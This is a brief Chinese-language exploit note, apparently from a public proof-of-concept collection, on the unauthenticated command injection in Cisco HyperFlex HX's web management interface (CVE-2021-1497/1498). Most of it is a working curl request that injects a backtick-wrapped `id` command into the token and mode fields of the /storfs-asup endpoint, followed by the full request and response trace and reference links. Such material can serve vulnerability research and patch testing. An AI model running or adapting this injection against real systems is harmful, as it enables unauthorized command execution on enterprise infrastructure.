# Cisco HyperFlex HX 命令注入（CVE-2021-1497/CVE-2021-1498）


Cisco HyperFlex HX的基于Web的管理界面中的多个漏洞可能允许未经身份验证的远程攻击者对受影响的设备执行命令注入攻击。


```
wvu@kharak:~$ curl -v http://192.168.123.133/storfs-asup -d 'action=&token=`id`&mode=`id`'
*   Trying 192.168.123.133...
* TCP_NODELAY set
* Connected to 192.168.123.133 (192.168.123.133) port 80 (#0)
> POST /storfs-asup HTTP/1.1
> Host: 192.168.123.133
> User-Agent: curl/7.64.1
> Accept: */*
> Content-Length: 28
> Content-Type: application/x-www-form-urlencoded
>
* upload completely sent off: 28 out of 28 bytes
< HTTP/1.1 200 OK
< Server: nginx/1.8.1
< Date: Tue, 18 May 2021 00:54:26 GMT
< Content-Length: 0
< Connection: keep-alive
< Front-End-Https: on
<
* Connection #0 to host 192.168.123.133 left intact
* Closing connection 0
wvu@kharak:~$

```

ref：

* https://attackerkb.com/topics/mDqlWhQovO/cve-2021-1497?referrer=home
* https://nvd.nist.gov/vuln/detail/CVE-2021-1497
* https://nvd.nist.gov/vuln/detail/CVE-2021-1498